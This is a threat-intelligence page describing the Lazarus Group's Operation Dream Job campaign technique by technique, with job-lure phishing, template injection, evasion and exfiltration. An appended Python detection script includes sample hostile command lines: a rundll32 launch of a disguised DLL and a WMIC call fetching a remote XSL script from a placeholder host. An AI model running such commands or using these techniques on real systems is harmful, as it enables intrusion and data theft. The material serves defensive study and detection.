Operation Dream Job

Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.[1][2][3][4]

ID: C0022
First Seen: September 2019 [3]
Last Seen: August 2020 [1]
Associated Campaigns: Operation North Star, Operation Interception
Version: 1.2
Created: 17 March 2023
Last Modified: 11 April 2024

Associated Campaign Descriptions

Name Description
Operation North Star

[2][5]

Operation Interception

[3]

Groups

ID Name Description
G0032 Lazarus Group

[1][2][5][3]

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

During Operation Dream Job, Lazarus Group used WMIC to execute a remote XSL script.[3]

Enterprise T1220 XSL Script Processing

During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.[3]

Enterprise T1005 Data from Local System

During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.[1][2]

Enterprise T1036 .008 Masquerading: Masquerade File Type

During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.[2][3]

Enterprise T1656 Impersonation

During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.[1][3][4]

Enterprise T1534 Internal Spearphishing

During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.[1]

Enterprise T1573 .001 Encrypted Channel: Symmetric Cryptography

During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.[2]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.[2]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.[3]

.003 Command and Scripting Interpreter: Windows Command Shell

During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.[3][2]

.005 Command and Scripting Interpreter: Visual Basic

During Operation Dream Job, Lazarus Group executed a malicious macro written in VBA after victims downloaded malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64-encoded DLL implant.[1][2]

Enterprise T1584 .001 Compromise Infrastructure: Domains

For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.[2][5]

.004 Compromise Infrastructure: Server

For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.[1][3][2]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

During Operation Dream Job, Lazarus Group used HTTP and HTTPS to contact actor-controlled C2 servers.[2]

Enterprise T1585 .001 Establish Accounts: Social Media Accounts

For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.[1][3]

.002 Establish Accounts: Email Accounts

During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.[3]

Enterprise T1587 .001 Develop Capabilities: Malware

For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.[1][3][2][5]

.002 Develop Capabilities: Code Signing Certificates

During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.[3]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

During Operation Dream Job, Lazarus Group archived victims' data into a RAR file.[3]

Enterprise T1593 .001 Search Open Websites/Domains: Social Media

For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.[3]

Enterprise T1591 Gather Victim Org Information

For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.[1]

.004 Gather Victim Org Information: Identify Roles

During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.[1][3]

Enterprise T1589 Gather Victim Identity Information

For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets.[1]

Enterprise T1083 File and Directory Discovery

During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.[1]

Enterprise T1608 .001 Stage Capabilities: Upload Malware

For Operation Dream Job, Lazarus Group used compromised servers to host malware.[1][3][2][5]

.002 Stage Capabilities: Upload Tool

For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.[3]

Enterprise T1110 Brute Force

During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts.[3]

Enterprise T1505 .004 Server Software Component: IIS Components

During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components.[2]

Enterprise T1106 Native API

During Operation Dream Job, Lazarus Group used the Windows API ObtainUserAgentString to obtain the victim's User-Agent and used the value to connect to their C2 server.[2]

Enterprise T1221 Template Injection

During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.[1][2]

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.[1][2][5]

.013 Obfuscated Files or Information: Encrypted/Encoded File

During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.[1][3][2][5]

Enterprise T1204 .001 User Execution: Malicious Link

During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.[1][3]

.002 User Execution: Malicious File

During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.[1][2]

Enterprise T1070 .004 Indicator Removal: File Deletion

During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.[3]

Enterprise T1218 .010 System Binary Proxy Execution: Regsvr32

During Operation Dream Job, Lazarus Group used regsvr32 to execute malware.[3]

.011 System Binary Proxy Execution: Rundll32

During Operation Dream Job, Lazarus Group executed malware with C:\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905.[1][3][2]

Enterprise T1614 .001 System Location Discovery: System Language Discovery

During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[1]

Enterprise T1583 .001 Acquire Infrastructure: Domains

During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.[3]

.004 Acquire Infrastructure: Server

During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.[3]

.006 Acquire Infrastructure: Web Services

During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive.[1]

Enterprise T1588 .002 Obtain Capabilities: Tool

For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.[1][3]

.003 Obtain Capabilities: Code Signing Certificates

During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.[3]

Enterprise T1497 .001 Virtualization/Sandbox Evasion: System Checks

During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.[1]

.003 Virtualization/Sandbox Evasion: Time Based Evasion

During Operation Dream Job, Lazarus Group used tools that collected GetTickCount and GetSystemTimeAsFileTime data to detect sandbox or VMware services.[1]

Enterprise T1622 Debugger Evasion

During Operation Dream Job, Lazarus Group used tools that used the IsDebuggerPresent call to detect debuggers.[1]

Enterprise T1087 .002 Account Discovery: Domain Account

During Operation Dream Job, Lazarus Group queried the compromised victim's Active Directory servers to obtain a list of employees, including administrator accounts.[3]

Enterprise T1105 Ingress Tool Transfer

During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.[1][3][2]

Enterprise T1041 Exfiltration Over C2 Channel

During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.[1]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

During Operation Dream Job, Lazarus Group used a custom build of the open-source command-line tool dbxcli to exfiltrate stolen data to Dropbox.[3][1]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.[1][2]

.002 Phishing: Spearphishing Link

During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.[1][3]

.003 Phishing: Spearphishing via Service

During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.[1][3]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.[3]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.[3]
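Two of the execution behaviours listed above leave distinctive process command lines: rundll32 handed a non-DLL file (the thumbnail.db command line quoted under T1218.011) and WMIC pulling a remote XSL stylesheet through /format: (T1047 / T1220). The triage below is an added example, not part of the ATT&CK page or the cited reports; the process-creation records are constructed, and the URL is a placeholder.

```python
import re

# First argument after rundll32[.exe], quoted or bare, stopping at the ",entrypoint" separator.
RUNDLL32_RE = re.compile(
    r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s+(?:"([^"]+)"|([^\s,]+))',
    re.IGNORECASE)
# WMIC /format: pointing at an http(s) URL means the XSL stylesheet is fetched remotely.
WMIC_REMOTE_XSL_RE = re.compile(r'/format:\s*"?(https?://[^"\s]+)', re.IGNORECASE)
# Directories ordinary users can write to; a module loaded from here deserves a look.
USER_WRITABLE = (r"c:\programdata", r"c:\users", r"c:\windows\temp")

SAMPLE_EVENTS = [  # constructed process-creation records; 4101 mirrors the quoted command line
    {"pid": 4101, "image": r"C:\windows\system32\rundll32.exe",
     "cmdline": r'C:\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905'},
    {"pid": 4102, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"https://example.invalid/update.xsl"'},  # placeholder URL
    {"pid": 4103, "image": r"C:\windows\system32\rundll32.exe",
     "cmdline": r'rundll32.exe shell32.dll,Control_RunDLL'},  # benign: system DLL
    {"pid": 4104, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get caption /format:list'},  # benign: built-in format
]

def check_rundll32(cmdline):
    """Flag rundll32 loading a module that is not a .dll or that lives in a user-writable path."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    module = (m.group(1) or m.group(2)).lower()
    if not module.endswith(".dll"):
        return f"rundll32 loading non-DLL module: {module}"
    if module.startswith(USER_WRITABLE):
        return f"rundll32 loading DLL from user-writable path: {module}"
    return None

def check_wmic(cmdline):
    """Flag WMIC invocations whose /format: argument is a remote URL (remote XSL execution)."""
    m = WMIC_REMOTE_XSL_RE.search(cmdline)
    if m and "wmic" in cmdline.lower():
        return f"WMIC fetching remote XSL stylesheet: {m.group(1)}"
    return None

def triage(events):
    """Return (pid, reason) pairs for every event that trips one of the checks."""
    hits = []
    for ev in events:
        for check in (check_rundll32, check_wmic):
            reason = check(ev["cmdline"])
            if reason:
                hits.append((ev["pid"], reason))
    return hits

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_EVENTS):
        print(pid, reason)
```

Feed it Sysmon Event ID 1 or Windows 4688 command lines; the benign rundll32 and WMIC records pass untouched, which keeps the rule usable on a real fleet.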

Software

ID Name Description
S0694 DRATzarus

During Operation Dream Job, Lazarus Group used DRATzarus to deploy open-source and commodity software such as Responder, Wake-On-Lan, and ChromePass onto infected hosts.[1]

S0174 Responder

[1]

S0678 Torisma

During Operation Dream Job, Lazarus Group used Torisma to actively monitor for new drives and remote desktop connections on an infected system.[2][5]

References